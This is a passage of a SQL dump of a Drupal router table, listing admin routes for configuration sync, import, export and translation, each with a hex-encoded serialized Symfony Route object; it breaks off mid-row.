('config.diff_collection', '/admin/config/development/configuration/sync/diff_collection/{collection}/{source_name}/{target_name}', '/admin/config/development/configuration/sync/diff_collection/%/%', 252, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a3130313a222f61646d696e2f636f6e6669672f646576656c6f706d656e742f636f6e66696775726174696f6e2f73796e632f646966665f636f6c6c656374696f6e2f7b636f6c6c656374696f6e7d2f7b736f757263655f6e616d657d2f7b7461726765745f6e616d657d223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a323a7b733a31313a225f636f6e74726f6c6c6572223b733a34383a225c44727570616c5c636f6e6669675c436f6e74726f6c6c65725c436f6e666967436f6e74726f6c6c65723a3a64696666223b733a31313a227461726765745f6e616d65223b4e3b7d733a31323a22726571756972656d656e7473223b613a313a7b733a31313a225f7065726d697373696f6e223b733a32353a2273796e6368726f6e697a6520636f6e66696775726174696f6e223b7d733a373a226f7074696f6e73223b613a343a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a343a2275746638223b623a313b733a31323a225f61646d696e5f726f757465223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a32333a226163636573735f636865636b2e7065726d697373696f6e223b7d7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a323a7b693a303b733a333a22474554223b693a313b733a343a22504f5354223b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a333a7b693a303b733a31303a22636f6c6c656374696f6e223b693a313b733a31313a22736f757263655f6e616d65223b693a323b733a31313a227461726765745f6e616d65223b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a3134333a227b5e2f61646d696e2f636f6e6669672f646576656c6f706d656e742f636f6e66696775726174696f6e2f73796e632f646966665f636f6c6c656374696f6e2f283f503c636f6c6c656374696f6e3e5b5e2f5d2b2b292f283f503c736f757263655f6e616d653e5b5e2f5d2b2b29283f3a2f283f503c7461726765745f6e616d653e5b5e2f5d2b2b29293f247d734475223b733a31313a22706174685f746f6b656e73223b613a343a7b693a303b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a31313a227461726765745f6e616d65223b693a343b623a313b7d693a313b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a31313a22736f757263655f6e616d65223b693a343b623a313b7d693a323b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a31303a22636f6c6c656374696f6e223b693a343b623a313b7d693a333b613a323a7b693a303b733a343a2274657874223b693a313b733a36303a222f61646d696e2f636f6e6669672f646576656c6f706d656e742f636f6e66696775726174696f6e2f73796e632f646966665f636f6c6c656374696f6e223b7d7d733a393a22706174685f76617273223b613a333a7b693a303b733a31303a22636f6c6c656374696f6e223b693a313b733a31313a22736f757263655f6e616d65223b693a323b733a31313a227461726765745f6e616d65223b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a3235323b733a31343a227061747465726e4f75746c696e65223b733a36343a222f61646d696e2f636f6e6669672f646576656c6f706d656e742f636f6e66696775726174696f6e2f73796e632f646966665f636f6c6c656374696f6e2f252f25223b733a383a226e756d5061727473223b693a393b7d7d, 9),
('config.export_download', '/admin/config/development/configuration/full/export-download', '/admin/config/development/configuration/full/export-download', 63, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a36303a222f61646d696e2f636f6e6669672f646576656c6f706d656e742f636f6e66696775726174696f6e2f66756c6c2f6578706f72742d646f776e6c6f6164223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a313a7b733a31313a225f636f6e74726f6c6c6572223b733a35383a225c44727570616c5c636f6e6669675c436f6e74726f6c6c65725c436f6e666967436f6e74726f6c6c65723a3a646f776e6c6f61644578706f7274223b7d733a31323a22726571756972656d656e7473223b613a313a7b733a31313a225f7065726d697373696f6e223b733a32303a226578706f727420636f6e66696775726174696f6e223b7d733a373a226f7074696f6e73223b613a343a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a343a2275746638223b623a313b733a31323a225f61646d696e5f726f757465223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a32333a226163636573735f636865636b2e7065726d697373696f6e223b7d7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a323a7b693a303b733a333a22474554223b693a313b733a343a22504f5354223b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a303a7b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a36383a227b5e2f61646d696e2f636f6e6669672f646576656c6f706d656e742f636f6e66696775726174696f6e2f66756c6c2f6578706f72745c2d646f776e6c6f6164247d734475223b733a31313a22706174685f746f6b656e73223b613a313a7b693a303b613a323a7b693a303b733a343a2274657874223b693a313b733a36303a222f61646d696e2f636f6e6669672f646576656c6f706d656e742f636f6e66696775726174696f6e2f66756c6c2f6578706f72742d646f776e6c6f6164223b7d7d733a393a22706174685f76617273223b613a303a7b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a36333b733a31343a227061747465726e4f75746c696e65223b733a36303a222f61646d696e2f636f6e6669672f646576656c6f706d656e742f636f6e66696775726174696f6e2f66756c6c2f6578706f72742d646f776e6c6f6164223b733a383a226e756d5061727473223b693a363b7d7d, 6),
('config.export_full', '/admin/config/development/configuration/full/export', '/admin/config/development/configuration/full/export', 63, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a35313a222f61646d696e2f636f6e6669672f646576656c6f706d656e742f636f6e66696775726174696f6e2f66756c6c2f6578706f7274223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a323a7b733a353a225f666f726d223b733a33363a225c44727570616c5c636f6e6669675c466f726d5c436f6e6669674578706f7274466f726d223b733a363a225f7469746c65223b733a363a224578706f7274223b7d733a31323a22726571756972656d656e7473223b613a313a7b733a31313a225f7065726d697373696f6e223b733a32303a226578706f727420636f6e66696775726174696f6e223b7d733a373a226f7074696f6e73223b613a343a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a343a2275746638223b623a313b733a31323a225f61646d696e5f726f757465223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a32333a226163636573735f636865636b2e7065726d697373696f6e223b7d7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a323a7b693a303b733a333a22474554223b693a313b733a343a22504f5354223b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a303a7b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a35383a227b5e2f61646d696e2f636f6e6669672f646576656c6f706d656e742f636f6e66696775726174696f6e2f66756c6c2f6578706f7274247d734475223b733a31313a22706174685f746f6b656e73223b613a313a7b693a303b613a323a7b693a303b733a343a2274657874223b693a313b733a35313a222f61646d696e2f636f6e6669672f646576656c6f706d656e742f636f6e66696775726174696f6e2f66756c6c2f6578706f7274223b7d7d733a393a22706174685f76617273223b613a303a7b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a36333b733a31343a227061747465726e4f75746c696e65223b733a35313a222f61646d696e2f636f6e6669672f646576656c6f706d656e742f636f6e66696775726174696f6e2f66756c6c2f6578706f7274223b733a383a226e756d5061727473223b693a363b7d7d, 6),
('config.export_single', '/admin/config/development/configuration/single/export/{config_type}/{config_name}', '/admin/config/development/configuration/single/export', 63, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a38313a222f61646d696e2f636f6e6669672f646576656c6f706d656e742f636f6e66696775726174696f6e2f73696e676c652f6578706f72742f7b636f6e6669675f747970657d2f7b636f6e6669675f6e616d657d223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a343a7b733a363a225f7469746c65223b733a31333a2253696e676c65206578706f7274223b733a353a225f666f726d223b733a34323a225c44727570616c5c636f6e6669675c466f726d5c436f6e66696753696e676c654578706f7274466f726d223b733a31313a22636f6e6669675f74797065223b4e3b733a31313a22636f6e6669675f6e616d65223b4e3b7d733a31323a22726571756972656d656e7473223b613a313a7b733a31313a225f7065726d697373696f6e223b733a32303a226578706f727420636f6e66696775726174696f6e223b7d733a373a226f7074696f6e73223b613a343a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a343a2275746638223b623a313b733a31323a225f61646d696e5f726f757465223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a32333a226163636573735f636865636b2e7065726d697373696f6e223b7d7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a323a7b693a303b733a333a22474554223b693a313b733a343a22504f5354223b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a323a7b693a303b733a31313a22636f6e6669675f74797065223b693a313b733a31313a22636f6e6669675f6e616d65223b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a3131383a227b5e2f61646d696e2f636f6e6669672f646576656c6f706d656e742f636f6e66696775726174696f6e2f73696e676c652f6578706f7274283f3a2f283f503c636f6e6669675f747970653e5b5e2f5d2b2b29283f3a2f283f503c636f6e6669675f6e616d653e5b5e2f5d2b2b29293f293f247d734475223b733a31313a22706174685f746f6b656e73223b613a333a7b693a303b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a31313a22636f6e6669675f6e616d65223b693a343b623a313b7d693a313b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a31313a22636f6e6669675f74797065223b693a343b623a313b7d693a323b613a323a7b693a303b733a343a2274657874223b693a313b733a35333a222f61646d696e2f636f6e6669672f646576656c6f706d656e742f636f6e66696775726174696f6e2f73696e676c652f6578706f7274223b7d7d733a393a22706174685f76617273223b613a323a7b693a303b733a31313a22636f6e6669675f74797065223b693a313b733a31313a22636f6e6669675f6e616d65223b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a36333b733a31343a227061747465726e4f75746c696e65223b733a35333a222f61646d696e2f636f6e6669672f646576656c6f706d656e742f636f6e66696775726174696f6e2f73696e676c652f6578706f7274223b733a383a226e756d5061727473223b693a383b7d7d, 8),
('config.import_full', '/admin/config/development/configuration/full/import', '/admin/config/development/configuration/full/import', 63, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a35313a222f61646d696e2f636f6e6669672f646576656c6f706d656e742f636f6e66696775726174696f6e2f66756c6c2f696d706f7274223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a323a7b733a353a225f666f726d223b733a33363a225c44727570616c5c636f6e6669675c466f726d5c436f6e666967496d706f7274466f726d223b733a363a225f7469746c65223b733a363a22496d706f7274223b7d733a31323a22726571756972656d656e7473223b613a313a7b733a31313a225f7065726d697373696f6e223b733a32303a22696d706f727420636f6e66696775726174696f6e223b7d733a373a226f7074696f6e73223b613a343a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a343a2275746638223b623a313b733a31323a225f61646d696e5f726f757465223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a32333a226163636573735f636865636b2e7065726d697373696f6e223b7d7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a323a7b693a303b733a333a22474554223b693a313b733a343a22504f5354223b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a303a7b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a35383a227b5e2f61646d696e2f636f6e6669672f646576656c6f706d656e742f636f6e66696775726174696f6e2f66756c6c2f696d706f7274247d734475223b733a31313a22706174685f746f6b656e73223b613a313a7b693a303b613a323a7b693a303b733a343a2274657874223b693a313b733a35313a222f61646d696e2f636f6e6669672f646576656c6f706d656e742f636f6e66696775726174696f6e2f66756c6c2f696d706f7274223b7d7d733a393a22706174685f76617273223b613a303a7b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a36333b733a31343a227061747465726e4f75746c696e65223b733a35313a222f61646d696e2f636f6e6669672f646576656c6f706d656e742f636f6e66696775726174696f6e2f66756c6c2f696d706f7274223b733a383a226e756d5061727473223b693a363b7d7d, 6),
('config.import_single', '/admin/config/development/configuration/single/import', '/admin/config/development/configuration/single/import', 63, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a35333a222f61646d696e2f636f6e6669672f646576656c6f706d656e742f636f6e66696775726174696f6e2f73696e676c652f696d706f7274223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a323a7b733a363a225f7469746c65223b733a31333a2253696e676c6520696d706f7274223b733a353a225f666f726d223b733a34323a225c44727570616c5c636f6e6669675c466f726d5c436f6e66696753696e676c65496d706f7274466f726d223b7d733a31323a22726571756972656d656e7473223b613a313a7b733a31313a225f7065726d697373696f6e223b733a32303a22696d706f727420636f6e66696775726174696f6e223b7d733a373a226f7074696f6e73223b613a343a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a343a2275746638223b623a313b733a31323a225f61646d696e5f726f757465223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a32333a226163636573735f636865636b2e7065726d697373696f6e223b7d7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a323a7b693a303b733a333a22474554223b693a313b733a343a22504f5354223b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a303a7b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a36303a227b5e2f61646d696e2f636f6e6669672f646576656c6f706d656e742f636f6e66696775726174696f6e2f73696e676c652f696d706f7274247d734475223b733a31313a22706174685f746f6b656e73223b613a313a7b693a303b613a323a7b693a303b733a343a2274657874223b693a313b733a35333a222f61646d696e2f636f6e6669672f646576656c6f706d656e742f636f6e66696775726174696f6e2f73696e676c652f696d706f7274223b7d7d733a393a22706174685f76617273223b613a303a7b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a36333b733a31343a227061747465726e4f75746c696e65223b733a35333a222f61646d696e2f636f6e6669672f646576656c6f706d656e742f636f6e66696775726174696f6e2f73696e676c652f696d706f7274223b733a383a226e756d5061727473223b693a363b7d7d, 6),
('config.sync', '/admin/config/development/configuration', '/admin/config/development/configuration', 15, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a33393a222f61646d696e2f636f6e6669672f646576656c6f706d656e742f636f6e66696775726174696f6e223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a323a7b733a353a225f666f726d223b733a33303a225c44727570616c5c636f6e6669675c466f726d5c436f6e66696753796e63223b733a363a225f7469746c65223b733a31313a2253796e6368726f6e697a65223b7d733a31323a22726571756972656d656e7473223b613a313a7b733a31313a225f7065726d697373696f6e223b733a32353a2273796e6368726f6e697a6520636f6e66696775726174696f6e223b7d733a373a226f7074696f6e73223b613a343a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a343a2275746638223b623a313b733a31323a225f61646d696e5f726f757465223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a32333a226163636573735f636865636b2e7065726d697373696f6e223b7d7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a323a7b693a303b733a333a22474554223b693a313b733a343a22504f5354223b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a303a7b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a34363a227b5e2f61646d696e2f636f6e6669672f646576656c6f706d656e742f636f6e66696775726174696f6e247d734475223b733a31313a22706174685f746f6b656e73223b613a313a7b693a303b613a323a7b693a303b733a343a2274657874223b693a313b733a33393a222f61646d696e2f636f6e6669672f646576656c6f706d656e742f636f6e66696775726174696f6e223b7d7d733a393a22706174685f76617273223b613a303a7b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a31353b733a31343a227061747465726e4f75746c696e65223b733a33393a222f61646d696e2f636f6e6669672f646576656c6f706d656e742f636f6e66696775726174696f6e223b733a383a226e756d5061727473223b693a343b7d7d, 4),
('config_translation.entity_list', '/admin/config/regional/config-translation/{mapper_id}', '/admin/config/regional/config-translation/%', 30, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a35333a222f61646d696e2f636f6e6669672f726567696f6e616c2f636f6e6669672d7472616e736c6174696f6e2f7b6d61707065725f69647d223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a313a7b733a31313a225f636f6e74726f6c6c6572223b733a37383a225c44727570616c5c636f6e6669675f7472616e736c6174696f6e5c436f6e74726f6c6c65725c436f6e6669675472616e736c6174696f6e4c697374436f6e74726f6c6c65723a3a6c697374696e67223b7d733a31323a22726571756972656d656e7473223b613a313a7b733a31313a225f7065726d697373696f6e223b733a32333a227472616e736c61746520636f6e66696775726174696f6e223b7d733a373a226f7074696f6e73223b613a343a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a343a2275746638223b623a313b733a31323a225f61646d696e5f726f757465223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a32333a226163636573735f636865636b2e7065726d697373696f6e223b7d7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a323a7b693a303b733a333a22474554223b693a313b733a343a22504f5354223b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a313a7b693a303b733a393a226d61707065725f6964223b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a37313a227b5e2f61646d696e2f636f6e6669672f726567696f6e616c2f636f6e6669675c2d7472616e736c6174696f6e2f283f503c6d61707065725f69643e5b5e2f5d2b2b29247d734475223b733a31313a22706174685f746f6b656e73223b613a323a7b693a303b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a393a226d61707065725f6964223b693a343b623a313b7d693a313b613a323a7b693a303b733a343a2274657874223b693a313b733a34313a222f61646d696e2f636f6e6669672f726567696f6e616c2f636f6e6669672d7472616e736c6174696f6e223b7d7d733a393a22706174685f76617273223b613a313a7b693a303b733a393a226d61707065725f6964223b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a33303b733a31343a227061747465726e4f75746c696e65223b733a34333a222f61646d696e2f636f6e6669672f726567696f6e616c2f636f6e6669672d7472616e736c6174696f6e2f25223b733a383a226e756d5061727473223b693a353b7d7d, 5),
('config_translation.item.add.captcha_settings', '/admin/config/people/captcha/translate/{langcode}/add', '/admin/config/people/captcha/translate/%/add', 125, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a35333a222f61646d696e2f636f6e6669672f70656f706c652f636170746368612f7472616e736c6174652f7b6c616e67636f64657d2f616464223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a323a7b733a353a225f666f726d223b733a35363a225c44727570616c5c636f6e6669675f7472616e736c6174696f6e5c466f726d5c436f6e6669675472616e736c6174696f6e416464466f726d223b733a393a22706c7567696e5f6964223b733a31363a22636170746368612e73657474696e6773223b7d733a31323a22726571756972656d656e7473223b613a313a7b733a33313a225f636f6e6669675f7472616e736c6174696f6e5f666f726d5f616363657373223b733a343a2254525545223b7d733a373a226f7074696f6e73223b613a343a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a31323a225f61646d696e5f726f757465223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a33303a22636f6e6669675f7472616e736c6174696f6e2e6163636573732e666f726d223b7d733a343a2275746638223b623a313b7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a303a7b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a313a7b693a303b733a383a226c616e67636f6465223b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a37303a227b5e2f61646d696e2f636f6e6669672f70656f706c652f636170746368612f7472616e736c6174652f283f503c6c616e67636f64653e5b5e2f5d2b2b292f616464247d734475223b733a31313a22706174685f746f6b656e73223b613a333a7b693a303b613a323a7b693a303b733a343a2274657874223b693a313b733a343a222f616464223b7d693a313b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a383a226c616e67636f6465223b693a343b623a313b7d693a323b613a323a7b693a303b733a343a2274657874223b693a313b733a33383a222f61646d696e2f636f6e6669672f70656f706c652f636170746368612f7472616e736c617465223b7d7d733a393a22706174685f76617273223b613a313a7b693a303b733a383a226c616e67636f6465223b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a3132353b733a31343a227061747465726e4f75746c696e65223b733a34343a222f61646d696e2f636f6e6669672f70656f706c652f636170746368612f7472616e736c6174652f252f616464223b733a383a226e756d5061727473223b693a373b7d7d, 7),
('config_translation.item.add.entity.block.edit_form', '/admin/structure/block/manage/{block}/translate/{langcode}/add', '/admin/structure/block/manage/%/translate/%/add', 245, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a36323a222f61646d696e2f7374727563747572652f626c6f636b2f6d616e6167652f7b626c6f636b7d2f7472616e736c6174652f7b6c616e67636f64657d2f616464223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a323a7b733a353a225f666f726d223b733a35363a225c44727570616c5c636f6e6669675f7472616e736c6174696f6e5c466f726d5c436f6e6669675472616e736c6174696f6e416464466f726d223b733a393a22706c7567696e5f6964223b733a353a22626c6f636b223b7d733a31323a22726571756972656d656e7473223b613a313a7b733a33313a225f636f6e6669675f7472616e736c6174696f6e5f666f726d5f616363657373223b733a343a2254525545223b7d733a373a226f7074696f6e73223b613a353a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a31303a22706172616d6574657273223b613a313a7b733a353a22626c6f636b223b613a323a7b733a343a2274797065223b733a31323a22656e746974793a626c6f636b223b733a393a22636f6e766572746572223b733a36333a2264727570616c2e70726f78795f6f726967696e616c5f736572766963652e706172616d636f6e7665727465722e636f6e666967656e746974795f61646d696e223b7d7d733a31323a225f61646d696e5f726f757465223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a33303a22636f6e6669675f7472616e736c6174696f6e2e6163636573732e666f726d223b7d733a343a2275746638223b623a313b7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a303a7b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a323a7b693a303b733a353a22626c6f636b223b693a313b733a383a226c616e67636f6465223b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a38393a227b5e2f61646d696e2f7374727563747572652f626c6f636b2f6d616e6167652f283f503c626c6f636b3e5b5e2f5d2b2b292f7472616e736c6174652f283f503c6c616e67636f64653e5b5e2f5d2b2b292f616464247d734475223b733a31313a22706174685f746f6b656e73223b613a353a7b693a303b613a323a7b693a303b733a343a2274657874223b693a313b733a343a222f616464223b7d693a313b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a383a226c616e67636f6465223b693a343b623a313b7d693a323b613a323a7b693a303b733a343a2274657874223b693a313b733a31303a222f7472616e736c617465223b7d693a333b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a353a22626c6f636b223b693a343b623a313b7d693a343b613a323a7b693a303b733a343a2274657874223b693a313b733a32393a222f61646d696e2f7374727563747572652f626c6f636b2f6d616e616765223b7d7d733a393a22706174685f76617273223b613a323a7b693a303b733a353a22626c6f636b223b693a313b733a383a226c616e67636f6465223b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a3234353b733a31343a227061747465726e4f75746c696e65223b733a34373a222f61646d696e2f7374727563747572652f626c6f636b2f6d616e6167652f252f7472616e736c6174652f252f616464223b733a383a226e756d5061727473223b693a383b7d7d, 8),
('config_translation.item.add.entity.block_content_type.edit_form', '/admin/structure/block-content/manage/{block_content_type}/translate/{langcode}/add', '/admin/structure/block-content/manage/%/translate/%/add', 245, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a38333a222f61646d696e2f7374727563747572652f626c6f636b2d636f6e74656e742f6d616e6167652f7b626c6f636b5f636f6e74656e745f747970657d2f7472616e736c6174652f7b6c616e67636f64657d2f616464223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a323a7b733a353a225f666f726d223b733a35363a225c44727570616c5c636f6e6669675f7472616e736c6174696f6e5c466f726d5c436f6e6669675472616e736c6174696f6e416464466f726d223b733a393a22706c7567696e5f6964223b733a31383a22626c6f636b5f636f6e74656e745f74797065223b7d733a31323a22726571756972656d656e7473223b613a313a7b733a33313a225f636f6e6669675f7472616e736c6174696f6e5f666f726d5f616363657373223b733a343a2254525545223b7d733a373a226f7074696f6e73223b613a353a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a31303a22706172616d6574657273223b613a313a7b733a31383a22626c6f636b5f636f6e74656e745f74797065223b613a323a7b733a343a2274797065223b733a32353a22656e746974793a626c6f636b5f636f6e74656e745f74797065223b733a393a22636f6e766572746572223b733a36333a2264727570616c2e70726f78795f6f726967696e616c5f736572766963652e706172616d636f6e7665727465722e636f6e666967656e746974795f61646d696e223b7d7d733a31323a225f61646d696e5f726f757465223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a33303a22636f6e6669675f7472616e736c6174696f6e2e6163636573732e666f726d223b7d733a343a2275746638223b623a313b7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a303a7b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a323a7b693a303b733a31383a22626c6f636b5f636f6e74656e745f74797065223b693a313b733a383a226c616e67636f6465223b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a3131313a227b5e2f61646d696e2f73747275637